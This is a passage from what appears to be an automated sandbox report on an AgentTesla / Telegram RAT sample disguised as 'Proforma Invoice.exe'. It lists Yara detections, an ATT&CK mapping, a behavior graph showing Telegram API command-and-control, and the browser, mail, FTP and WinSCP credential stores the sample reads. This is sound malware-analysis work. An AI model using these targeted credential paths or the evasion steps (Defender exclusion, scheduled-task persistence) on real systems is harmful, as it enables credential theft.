                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Users\user\Desktop\Proforma Invoice.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 1500, type: MEMORYSTR
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.459ae68.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.45cf688.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.636659642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.412155830.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.412961855.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 1500, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: Yara matchFile source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 1500, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 1500, type: MEMORYSTR
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.459ae68.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.45cf688.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.636659642.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.412155830.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.412961855.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 7152, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 1500, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Web Service                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scheduled Task/Job                    		Boot or Logon Initialization Scripts1
                    Scheduled Task/Job                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Credentials in Registry                    		114
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		Exfiltration Over Bluetooth11
                    Encrypted Channel                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
                    Obfuscated Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		Automated Exfiltration2
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                    Software Packing                    		NTDS311
                    Security Software Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer3
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Masquerading                    		LSA Secrets1
                    Process Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common131
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials131
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                    Process Injection                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    Remote System Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 668067 Sample: Proforma Invoice.exe Startdate: 18/07/2022 Architecture: WINDOWS Score: 100 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Multi AV Scanner detection for dropped file 2->39 41 16 other signatures 2->41 7 Proforma Invoice.exe 12 2->7         started        process3 file4 23 C:\Users\user\AppData\...\ebJpPhiwjcAviB.exe, PE32 7->23 dropped 25 C:\...\ebJpPhiwjcAviB.exe:Zone.Identifier, ASCII 7->25 dropped 27 C:\Users\user\AppData\Local\...\tmp8D30.tmp, XML 7->27 dropped 29 C:\Users\user\...\Proforma Invoice.exe.log, ASCII 7->29 dropped 43 Adds a directory exclusion to Windows Defender 7->43 11 Proforma Invoice.exe 15 6 7->11         started        15 powershell.exe 25 7->15         started        17 schtasks.exe 1 7->17         started        signatures5 process6 dnsIp7 31 api.telegram.org 149.154.167.220, 443, 49781, 49785 TELEGRAMRU United Kingdom 11->31 33 192.168.2.1 unknown unknown 11->33 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->45 47 Tries to steal Mail credentials (via file / registry access) 11->47 49 Tries to harvest and steal ftp login credentials 11->49 51 Tries to harvest and steal browser information (history, passwords, etc) 11->51 19 conhost.exe 15->19         started        21 conhost.exe 17->21         started        signatures8 process9

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Proforma Invoice.exe31%VirustotalBrowse
                    Proforma Invoice.exe37%MetadefenderBrowse
                    Proforma Invoice.exe55%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    Proforma Invoice.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe37%MetadefenderBrowse
                    C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe55%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    8.2.Proforma Invoice.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    8.0.Proforma Invoice.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    8.0.Proforma Invoice.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    8.0.Proforma Invoice.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    8.0.Proforma Invoice.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    8.0.Proforma Invoice.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://a7Yu7sNuvhjH4U.com0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    https://api.ipify.org%%startupfolder%0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
